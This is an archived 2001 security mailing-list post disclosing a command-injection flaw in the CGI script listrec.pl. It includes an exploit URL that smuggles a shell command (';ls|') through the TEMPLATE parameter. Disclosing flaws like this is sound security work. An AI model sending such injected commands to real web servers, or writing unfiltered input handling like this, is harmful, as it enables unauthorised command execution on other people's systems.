OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Alexey Sintsov (don_huanxakep.ru)
Date: Tue Sep 11 2001 - 23:01:24 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Last update (of listrec.pl) Jon Wright 11/11/1998.

    This script has vulnerability (does not filter input of the
    user) which allows to carry out commands from
    WebServer.

    EXPLOIT:
    www.server.com/cgi-bin/common/listrec.pl?
    APP=qmh-news&TEMPLATE=;ls|

    XP-TEAM